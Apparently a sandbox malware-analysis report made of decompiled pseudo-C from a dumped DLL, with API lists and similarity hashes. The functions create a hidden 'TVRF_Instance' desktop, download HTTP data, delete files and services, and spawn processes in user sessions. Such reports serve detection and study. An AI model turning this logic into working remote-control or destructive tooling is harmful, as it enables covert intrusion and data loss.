                                                                                                                        							_t7 = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
                                                                                                                        							 *0x6f340480 = _t7;
                                                                                                                        							if(_t7 != 0) {
                                                                                                                        								_t15 = CreateThread(0, 0, E6F3396D0, _a4, 0, 0);
                                                                                                                        								if(_t15 != 0) {
                                                                                                                        									WaitForSingleObject(_t15, 0xffffffff);
                                                                                                                        									CloseHandle(_t15);
                                                                                                                        									Sleep(0xfa0);
                                                                                                                        								}
                                                                                                                        								_t13 =  *0x6f340480; // 0x0
                                                                                                                        								return CloseDesktop(_t13);
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						return _t7;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					_push(__edi);
                                                                                                                        					__eax = CreateEventA(0, 1, 0, "TVRF_Instance");
                                                                                                                        					__edi = __eax;
                                                                                                                        					if(__edi == 0) {
                                                                                                                        						L12:
                                                                                                                        						_pop(__edi);
                                                                                                                        						return __eax;
                                                                                                                        					}
                                                                                                                        					if(GetLastError() == 0xb7) {
                                                                                                                        						__eax = CloseHandle(__edi);
                                                                                                                        						goto L12;
                                                                                                                        					}
                                                                                                                        					__eax = GetCurrentThreadId();
                                                                                                                        					__eax = GetThreadDesktop(__eax);
                                                                                                                        					__ebx = CloseHandle;
                                                                                                                        					 *0x6f340484 = __eax;
                                                                                                                        					if(__eax != 0) {
                                                                                                                        						__eax = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
                                                                                                                        						 *0x6f340480 = __eax;
                                                                                                                        						if(__eax != 0) {
                                                                                                                        							__eax = _a4;
                                                                                                                        							_push(__esi);
                                                                                                                        							__esi = CreateThread(0, 0, E6F339D10, _a4, 0, 0);
                                                                                                                        							if(__esi != 0) {
                                                                                                                        								WaitForSingleObject(__esi, 0xffffffff) = CloseHandle(__esi);
                                                                                                                        								Sleep(0xfa0);
                                                                                                                        							}
                                                                                                                        							__ecx =  *0x6f340480; // 0x0
                                                                                                                        							__eax = CloseDesktop(__ecx);
                                                                                                                        							_pop(__esi);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					__eax = CloseHandle(__edi);
                                                                                                                        					_pop(__edi);
                                                                                                                        					return __eax;
                                                                                                                        				}
                                                                                                                        			}










                                                                                                                        APIs
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,TVRF_Instance,770CF930,6F33A2BE,00000001,?,?,?,?,?,?), ref: 6F33A163
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 6F33A16F
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F33A17D
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6F33A186
                                                                                                                        • GetThreadDesktop.USER32(00000000,?,?,?,?,?,?,?), ref: 6F33A18D
                                                                                                                        • CreateDesktopA.USER32 ref: 6F33A1B4
                                                                                                                        • CreateThread.KERNEL32 ref: 6F33A1D6
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?), ref: 6F33A1E5
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 6F33A1EC
                                                                                                                        • Sleep.KERNEL32(00000FA0,?,?,?,?,?,?,?), ref: 6F33A1F3
                                                                                                                        • CloseDesktop.USER32(00000000,?,?,?,?,?,?,?), ref: 6F33A200
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 6F33A208
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$CreateDesktopHandleThread$CurrentErrorEventLastObjectSingleSleepWait
                                                                                                                        • String ID: TVRF_Instance
                                                                                                                        • API String ID: 2944326888-3589830093
                                                                                                                        • Opcode ID: eedc57a1382bf668ba28d078a0f19c4b8f1f075d3e072cac6b6d4a3e601bec31
                                                                                                                        • Instruction ID: bac5d0e4c9355bf7b1ac25f67ff437522f8d4f87fd77d88c8d8bfccc3d769250
                                                                                                                        • Opcode Fuzzy Hash: eedc57a1382bf668ba28d078a0f19c4b8f1f075d3e072cac6b6d4a3e601bec31
                                                                                                                        • Instruction Fuzzy Hash: 1021C077A45BA6ABEF60EB249C48F99376EEB43731F10020DF521952C0CB79E460DA25
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F335540(void* _a4, intOrPtr* _a8) {
                                                                                                                        				long _v4;
                                                                                                                        				void _v8;
                                                                                                                        				long* _v12;
                                                                                                                        				void* _v16;
                                                                                                                        				intOrPtr _v28;
                                                                                                                        				long _v32;
                                                                                                                        				void* _v44;
                                                                                                                        				int _v48;
                                                                                                                        				long _v60;
                                                                                                                        				int _t35;
                                                                                                                        				long _t40;
                                                                                                                        				void* _t44;
                                                                                                                        				long _t53;
                                                                                                                        				DWORD* _t54;
                                                                                                                        
                                                                                                                        				_t54 = 0;
                                                                                                                        				_t53 = 0;
                                                                                                                        				_t44 = HeapAlloc(GetProcessHeap(), 8, 0x2000);
                                                                                                                        				if(_t44 == 0) {
                                                                                                                        					 *_a8 = 0;
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_v8 = 0;
                                                                                                                        					_v4 = 4;
                                                                                                                        					if(HttpQueryInfoA(_a4, 0x20000013,  &_v8,  &_v4, 0) != 0 && _v28 == 0xc8) {
                                                                                                                        						_v32 = 0;
                                                                                                                        						if(InternetReadFile(_v16, _t44, 0x1fff,  &_v32) != 0) {
                                                                                                                        							while(1) {
                                                                                                                        								_t35 = _v48;
                                                                                                                        								if(_t35 == 0) {
                                                                                                                        									goto L15;
                                                                                                                        								}
                                                                                                                        								if(_t54 > 0x100000) {
                                                                                                                        									if(_t53 != 0) {
                                                                                                                        										goto L13;
                                                                                                                        									}
                                                                                                                        									goto L14;
                                                                                                                        								} else {
                                                                                                                        									if(_t53 != 0) {
                                                                                                                        										_t40 = HeapReAlloc(GetProcessHeap(), 0, _t53, _t35 + _t54 + 1);
                                                                                                                        										if(_t40 == 0) {
                                                                                                                        											L13:
                                                                                                                        											HeapFree(GetProcessHeap(), 0, _t53);
                                                                                                                        											L14:
                                                                                                                        											_t53 = 0;
                                                                                                                        											_t54 = 0;
                                                                                                                        										} else {
                                                                                                                        											goto L10;
                                                                                                                        										}
                                                                                                                        									} else {
                                                                                                                        										_t12 = _t54 + 1; // 0x20000014
                                                                                                                        										_t40 = HeapAlloc(GetProcessHeap(), _t53, _t35 + _t12);
                                                                                                                        										L10:
                                                                                                                        										_t53 = _t40;
                                                                                                                        										RtlMoveMemory(_t53 + _t54, _t44, _v48);
                                                                                                                        										_t54 = _t54 + _v60;
                                                                                                                        										 *(_t53 + _t54) = 0;
                                                                                                                        										_v60 = 0;
                                                                                                                        										if(InternetReadFile(_v44, _t44, 0x1fff,  &_v60) != 0) {
                                                                                                                        											continue;
                                                                                                                        										} else {
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								goto L15;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L15:
                                                                                                                        					HeapFree(GetProcessHeap(), 0, _t44);
                                                                                                                        					 *_v12 = _t53;
                                                                                                                        					return _t54;
                                                                                                                        				}
                                                                                                                        			}


















                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00002000,00000000,00000000,?,00000000), ref: 6F335558
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33555B
                                                                                                                        • HttpQueryInfoA.WININET ref: 6F33558C
                                                                                                                        • InternetReadFile.WININET(?,00000000,00001FFF,20000013), ref: 6F3355BC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,20000014), ref: 6F3355EE
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3355F1
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 6F335601
                                                                                                                        • HeapReAlloc.KERNEL32(00000000), ref: 6F335604
                                                                                                                        • RtlMoveMemory.NTDLL(?,00000000,20000013), ref: 6F33561A
                                                                                                                        • InternetReadFile.WININET(?,00000000,00001FFF,20000013), ref: 6F33563F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F335652
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F335655
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F335662
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F335665
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Alloc$FileFreeInternetRead$HttpInfoMemoryMoveQuery
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1362589046-0
                                                                                                                        • Opcode ID: cc3f2d6d5998976383643e1cb91f6efb3d010b5224ff75cb4ca6b6eedd9969db
                                                                                                                        • Instruction ID: 3b712053e6030056f4d301237fd8775ea5e0c5217c75fde754730b638ba1ce80
                                                                                                                        • Opcode Fuzzy Hash: cc3f2d6d5998976383643e1cb91f6efb3d010b5224ff75cb4ca6b6eedd9969db
                                                                                                                        • Instruction Fuzzy Hash: 373189B26043A6ABE710CE699844F6BB7AEFB89754F00091DF949C2140DB31E9088B61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 81%
                                                                                                                        			E6F3328B0(intOrPtr _a8) {
                                                                                                                        				intOrPtr _v4;
                                                                                                                        				char _v520;
                                                                                                                        				char _v528;
                                                                                                                        				struct _WIN32_FIND_DATAA _v840;
                                                                                                                        				void* _t25;
                                                                                                                        				intOrPtr _t36;
                                                                                                                        				char _t43;
                                                                                                                        				void* _t48;
                                                                                                                        				CHAR* _t49;
                                                                                                                        				struct _WIN32_FIND_DATAA* _t53;
                                                                                                                        				DWORD* _t54;
                                                                                                                        
                                                                                                                        				_t53 =  &_v840;
                                                                                                                        				_push(0x140);
                                                                                                                        				_push( &_v840);
                                                                                                                        				L6F33C2EE();
                                                                                                                        				_push(0x208);
                                                                                                                        				_push( &_v528);
                                                                                                                        				L6F33C2EE();
                                                                                                                        				_t43 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        				_t49 = _t53 + wsprintfA( &(_v840.cAlternateFileName), "%s", _t43) + 0x160;
                                                                                                                        				wsprintfA(_t49, "%s%c%s", 0x6f33d543, 0x2a, _v4);
                                                                                                                        				_t54 =  &(_t53->nFileSizeLow);
                                                                                                                        				_t25 = FindFirstFileA( &_v520,  &_v840);
                                                                                                                        				_t48 = _t25;
                                                                                                                        				 *_t49 = 0;
                                                                                                                        				if(_t48 == 0xffffffff) {
                                                                                                                        					return _t25;
                                                                                                                        				} else {
                                                                                                                        					_t36 = _a8;
                                                                                                                        					do {
                                                                                                                        						if(lstrcmpA( &(_v840.cFileName), ".") != 0 && lstrcmpA( &(_v840.cFileName), "..") != 0) {
                                                                                                                        							lstrcatA( &_v520,  &(_v840.cFileName));
                                                                                                                        							if((_v840.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                        								if(_t36 == 0) {
                                                                                                                        									E6F332750( &_v520);
                                                                                                                        									_t54 =  &(_t54[1]);
                                                                                                                        								} else {
                                                                                                                        									DeleteFileA( &_v520);
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						 *_t49 = 0;
                                                                                                                        					} while (FindNextFileA(_t48,  &_v840) != 0);
                                                                                                                        					return FindClose(_t48);
                                                                                                                        				}
                                                                                                                        			}















                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(00000140,00000140), ref: 6F3328C2
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000208), ref: 6F3328D4
                                                                                                                        • wsprintfA.USER32 ref: 6F3328F3
                                                                                                                        • wsprintfA.USER32 ref: 6F332911
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 6F332923
                                                                                                                        • lstrcmpA.KERNEL32(?,6F33D538), ref: 6F332950
                                                                                                                        • lstrcmpA.KERNEL32(?,6F33D534), ref: 6F332960
                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 6F332973
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 6F33298C
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 6F3329AD
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 6F3329B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$MemoryZerolstrcmpwsprintf$CloseDeleteFirstNextlstrcat
                                                                                                                        • String ID: %s%c%s
                                                                                                                        • API String ID: 1322953341-2756932909
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 69%
                                                                                                                        			E6F333610(intOrPtr _a8) {
                                                                                                                        				WCHAR* _v24;
                                                                                                                        				struct _STARTUPINFOW _v96;
                                                                                                                        				struct _PROCESS_INFORMATION _v112;
                                                                                                                        				long _v116;
                                                                                                                        				void* _v120;
                                                                                                                        				void* _t19;
                                                                                                                        				void* _t26;
                                                                                                                        				WCHAR* _t29;
                                                                                                                        				void* _t37;
                                                                                                                        				intOrPtr _t38;
                                                                                                                        
                                                                                                                        				_push(_a8);
                                                                                                                        				_t19 = E6F3334B0();
                                                                                                                        				_t37 = _t19;
                                                                                                                        				_t38 = 0;
                                                                                                                        				if(_t37 != 0) {
                                                                                                                        					_push(0);
                                                                                                                        					_push(_t37);
                                                                                                                        					_push( &(_v96.lpReserved));
                                                                                                                        					_v96.lpDesktop = 0x20;
                                                                                                                        					_v96.lpReserved = 0;
                                                                                                                        					L6F33C37E();
                                                                                                                        					if(_t19 != 0) {
                                                                                                                        						_v112.dwThreadId = 0x420;
                                                                                                                        					}
                                                                                                                        					_push(0x44);
                                                                                                                        					_push( &(_v96.dwX));
                                                                                                                        					L6F33C2EE();
                                                                                                                        					_push(0x10);
                                                                                                                        					_push( &(_v112.dwProcessId));
                                                                                                                        					_v96.lpDesktop = 0x44;
                                                                                                                        					_v96.dwX = L"Winsta0\\Default";
                                                                                                                        					L6F33C2EE();
                                                                                                                        					_t29 = _v24;
                                                                                                                        					while(CreateProcessAsUserW(_t37, 0, _t29, 0, 0, 0, _v116, _v120, 0,  &_v96,  &_v112) == 0) {
                                                                                                                        						Sleep(0x1f4);
                                                                                                                        						_t38 = _t38 + 1;
                                                                                                                        						if(_t38 < 0x78) {
                                                                                                                        							continue;
                                                                                                                        						}
                                                                                                                        						L8:
                                                                                                                        						_t26 = _v120;
                                                                                                                        						if(_t26 != 0) {
                                                                                                                        							_push(_t26);
                                                                                                                        							L6F33C378();
                                                                                                                        						}
                                                                                                                        						return CloseHandle(_t37);
                                                                                                                        					}
                                                                                                                        					CloseHandle(_v112.hThread);
                                                                                                                        					CloseHandle(_v112);
                                                                                                                        					goto L8;
                                                                                                                        				}
                                                                                                                        				return _t19;
                                                                                                                        			}














                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F3334B0: WTSEnumerateSessionsA.WTSAPI32(00000000,00000000,00000001,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F3334DE
                                                                                                                          • Part of subcall function 6F3334B0: WTSFreeMemory.WTSAPI32(?,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F33353C
                                                                                                                          • Part of subcall function 6F3334B0: Sleep.KERNEL32(000001F4,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F33354C
                                                                                                                        • CreateEnvironmentBlock.USERENV ref: 6F333641
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 6F33365B
                                                                                                                        • RtlZeroMemory.NTDLL ref: 6F333677
                                                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000020,?,00000000,?,00000020,?,?,?,00000010,?), ref: 6F3336A6
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,00000010,?,00000044,00000000), ref: 6F3336B1
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000010,?,00000044,00000000), ref: 6F3336D0
                                                                                                                        • CloseHandle.KERNEL32(00000020,?,?,?,00000010,?,00000044,00000000), ref: 6F3336D7
                                                                                                                        • DestroyEnvironmentBlock.USERENV(?,?,00000010,?,00000044,00000000), ref: 6F3336E4
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000010,?,00000044,00000000), ref: 6F3336EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleMemory$BlockCreateEnvironmentSleepZero$DestroyEnumerateFreeProcessSessionsUser
                                                                                                                        • String ID: $D
                                                                                                                        • API String ID: 826248435-1196817373
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 88%
                                                                                                                        			E6F332DF0(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                        				char _v512;
                                                                                                                        				char _v520;
                                                                                                                        				char _v832;
                                                                                                                        				struct _WIN32_FIND_DATAA _v840;
                                                                                                                        				signed char _t19;
                                                                                                                        				CHAR* _t26;
                                                                                                                        				intOrPtr _t29;
                                                                                                                        				void* _t36;
                                                                                                                        				void* _t37;
                                                                                                                        				FILETIME* _t40;
                                                                                                                        
                                                                                                                        				_t29 = _a4;
                                                                                                                        				_t37 = 0;
                                                                                                                        				wsprintfA( &_v520, "%s%c%s", _t29, 0x2a, _a8);
                                                                                                                        				_t40 =  &( &_v840->ftLastWriteTime);
                                                                                                                        				_push(0x140);
                                                                                                                        				_push( &_v832);
                                                                                                                        				L6F33C2EE();
                                                                                                                        				_t36 = FindFirstFileA( &_v520,  &_v840);
                                                                                                                        				if(_t36 != 0xffffffff) {
                                                                                                                        					do {
                                                                                                                        						_t19 = _v840.dwFileAttributes;
                                                                                                                        						if((_t19 & 0x00000010) == 0 && _t19 != 0) {
                                                                                                                        							wsprintfA( &_v520, "%s%s", _t29,  &(_v840.cFileName));
                                                                                                                        							_t40 = _t40 + 0x10;
                                                                                                                        							_t26 = DeleteFileA( &_v512);
                                                                                                                        							if(_t26 == 0) {
                                                                                                                        								MoveFileExA( &_v512, _t26, 4);
                                                                                                                        							}
                                                                                                                        							_t37 = 1;
                                                                                                                        						}
                                                                                                                        					} while (FindNextFileA(_t36,  &_v840) != 0);
                                                                                                                        					FindClose(_t36);
                                                                                                                        					return _t37;
                                                                                                                        				} else {
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        			}














                                                                                                                        APIs
                                                                                                                        • wsprintfA.USER32 ref: 6F332E1E
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000140), ref: 6F332E2D
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,00000140), ref: 6F332E3F
                                                                                                                        • wsprintfA.USER32 ref: 6F332E7F
                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 6F332E8C
                                                                                                                        • MoveFileExA.KERNEL32 ref: 6F332EA1
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 6F332EB2
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 6F332EBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$wsprintf$CloseDeleteFirstMemoryMoveNextZero
                                                                                                                        • String ID: %s%c%s$%s%s
                                                                                                                        • API String ID: 3499340181-3555087778
                                                                                                                        • Opcode ID: 1e441bb8b4b3cb56a1f0265f5d2aff9d2d82852ddff8eecaa43896e3dead2926
                                                                                                                        • Instruction ID: f4bc618684fe5d52835a5a6c54ff989a0e3287ad4fc953531d052855620c27db
                                                                                                                        • Opcode Fuzzy Hash: 1e441bb8b4b3cb56a1f0265f5d2aff9d2d82852ddff8eecaa43896e3dead2926
                                                                                                                        • Instruction Fuzzy Hash: 7321D573A04395ABD320DBA4DC85EEB73ADEBC8721F40091DFA54D6140EB35E11487A1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 73%
                                                                                                                        			E6F334EF0(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                        				DWORD* _v0;
                                                                                                                        				signed int _v4;
                                                                                                                        				signed int _v8;
                                                                                                                        				CHAR* _v12;
                                                                                                                        				struct _STARTUPINFOA _v84;
                                                                                                                        				char _v92;
                                                                                                                        				void* _v96;
                                                                                                                        				void* _v100;
                                                                                                                        				signed int _t17;
                                                                                                                        				signed int _t23;
                                                                                                                        				long _t27;
                                                                                                                        				DWORD* _t30;
                                                                                                                        				intOrPtr _t33;
                                                                                                                        				struct _PROCESS_INFORMATION* _t44;
                                                                                                                        
                                                                                                                        				_t44 =  &_v84;
                                                                                                                        				_push(0x44);
                                                                                                                        				_push( &(_v84.dwX));
                                                                                                                        				L6F33C2EE();
                                                                                                                        				_push(0x10);
                                                                                                                        				_push( &_v92);
                                                                                                                        				L6F33C2EE();
                                                                                                                        				_t17 = _v8;
                                                                                                                        				_v84.cb = 0x44;
                                                                                                                        				if(_t17 == 0) {
                                                                                                                        					_v84.dwFlags = 1;
                                                                                                                        				}
                                                                                                                        				_t33 = _a12;
                                                                                                                        				if(_t33 != 0) {
                                                                                                                        					_v84.lpDesktop = _t33;
                                                                                                                        				}
                                                                                                                        				asm("sbb eax, eax");
                                                                                                                        				if(CreateProcessA(0, _v12, 0, 0, 0,  ~_t17 & 0x08000000, 0, _a8,  &_v84, _t44) == 0) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t23 = _v4;
                                                                                                                        					if(_t23 != 0) {
                                                                                                                        						if(_t23 == 0xffffffff) {
                                                                                                                        							_t27 = _t23 | 0xffffffff;
                                                                                                                        						} else {
                                                                                                                        							_t27 = _t23 * 0x3e8;
                                                                                                                        						}
                                                                                                                        						if(WaitForSingleObject(_v100, _t27) != 0) {
                                                                                                                        							if(_a4 != 0) {
                                                                                                                        								_push(0);
                                                                                                                        								_push(_v100);
                                                                                                                        								L6F33C30C();
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							_t30 = _v0;
                                                                                                                        							if(_t30 != 0) {
                                                                                                                        								GetExitCodeProcess(_v100, _t30);
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					CloseHandle(_v96);
                                                                                                                        					CloseHandle(_v100);
                                                                                                                        					return 1;
                                                                                                                        				}
                                                                                                                        			}


















                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 6F334EFA
                                                                                                                        • RtlZeroMemory.NTDLL(00000044,00000010), ref: 6F334F06
                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,?), ref: 6F334F56
                                                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 6F334F7D
                                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 6F334F94
                                                                                                                        • NtTerminateProcess.NTDLL(00000000,00000000), ref: 6F334FA9
                                                                                                                        • CloseHandle.KERNEL32(00000044), ref: 6F334FBA
                                                                                                                        • CloseHandle.KERNEL32(00000044), ref: 6F334FC1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseHandleMemoryZero$CodeCreateExitObjectSingleTerminateWait
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 2123967418-2746444292
                                                                                                                        • Opcode ID: 1c6ec34be75abdd9849f1e6a5a3d158d07c0fbc19b670bdfa033a27e5f27ee90
                                                                                                                        • Instruction ID: 1f66655607f68f2d6858a68d12e090dfd645e0519f7c0ebd8c6f870ef632578d
                                                                                                                        • Opcode Fuzzy Hash: 1c6ec34be75abdd9849f1e6a5a3d158d07c0fbc19b670bdfa033a27e5f27ee90
                                                                                                                        • Instruction Fuzzy Hash: B9214F72A583916BE714DB64CD40F5B73EDBF84B14F144A1DB5A0C62D0D77AE804CB52
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F333700(char* _a4, intOrPtr _a8) {
                                                                                                                        				intOrPtr _v24;
                                                                                                                        				struct _SERVICE_STATUS _v28;
                                                                                                                        				int _v32;
                                                                                                                        				char* _t12;
                                                                                                                        				void* _t24;
                                                                                                                        				void* _t28;
                                                                                                                        				void* _t31;
                                                                                                                        				int _t32;
                                                                                                                        
                                                                                                                        				_t32 = 0;
                                                                                                                        				_v32 = 0;
                                                                                                                        				_t12 = OpenSCManagerA(0, 0, 0xf003f);
                                                                                                                        				_t24 = _t12;
                                                                                                                        				if(_t24 != 0) {
                                                                                                                        					L2:
                                                                                                                        					_t28 = OpenServiceA(_t24, _a4, 0xf01ff);
                                                                                                                        					if(_t28 == 0) {
                                                                                                                        						L13:
                                                                                                                        						CloseServiceHandle(_t24);
                                                                                                                        						L14:
                                                                                                                        						return _t32;
                                                                                                                        					}
                                                                                                                        					QueryServiceStatus(_t28,  &_v28);
                                                                                                                        					if(_v24 == 1) {
                                                                                                                        						L9:
                                                                                                                        						if(_a8 != 0) {
                                                                                                                        							_v32 = DeleteService(_t28);
                                                                                                                        						} else {
                                                                                                                        							_v32 = 1;
                                                                                                                        						}
                                                                                                                        						L12:
                                                                                                                        						CloseServiceHandle(_t28);
                                                                                                                        						_t32 = _v32;
                                                                                                                        						goto L13;
                                                                                                                        					}
                                                                                                                        					if(ControlService(_t28, 1,  &_v28) == 0) {
                                                                                                                        						goto L12;
                                                                                                                        					}
